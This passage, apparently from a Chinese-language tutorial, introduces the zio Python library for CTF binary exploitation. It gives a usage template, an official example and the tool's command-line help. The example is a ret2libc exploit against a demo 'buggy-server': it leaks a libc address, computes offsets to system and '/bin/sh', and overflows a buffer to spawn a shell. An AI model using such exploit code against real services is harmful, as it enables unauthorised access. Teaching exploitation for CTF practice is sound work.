from zio import*if you_are_debugging_local_server_binary: io =zio('./buggy-server')# used for local pwning developmentelif you_are_pwning_remote_server: io =zio(('1.2.3.4', 1337))# used to exploit remote serviceio.write(your_awesome_ropchain_or_shellcode)# hey, we got an interactive shell!io.interact()
官方示例:
from zio import*io =zio('./buggy-server')# io = zio((pwn.server, 1337))for i inxrange(1337): io.writeline('add '+str(i)) io.read_until('>>')io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo "+"A"*49+"\nshow\n")io.read_until('A'*49)libc_base =l32(io.read(4))-0x1a9960libc_system = libc_base +0x3ea70libc_binsh = libc_base +0x15fcbfpayload ='A'*64+l32(libc_system)+'JJJJ'+l32(libc_binsh)io.write('info '+ payload +"\nshow\nexit\n")io.read_until(">>")# We've got a shell;-)io.interact()
l 和 b 就是指小端序和大端序。这些函数可以对应 pwntools 里的 p32(),p64()等。
当然你也可以直接在命令行下使用它:
$ zio -h
usage:
$ zio [options] cmdline | host port
options:
-h, --help help page, you are reading this now!
-i, --stdin tty|pipe, specify tty or pipe stdin, default to tty
-o, --stdout tty|pipe, specify tty or pipe stdout, default to tty
-t, --timeout integer seconds, specify timeout
-r, --read how to print out content read from child process, may be RAW(True), NONE(False), REPR, HEX
-w, --write how to print out content written to child process, may be RAW(True), NONE(False), REPR, HEX
-a, --ahead message to feed into stdin before interact
-b, --before don't do anything before reading those input
-d, --decode when in interact mode, this option can be used to specify decode function REPR/HEX to input raw hex bytes
-l, --delay write delay, time to wait before write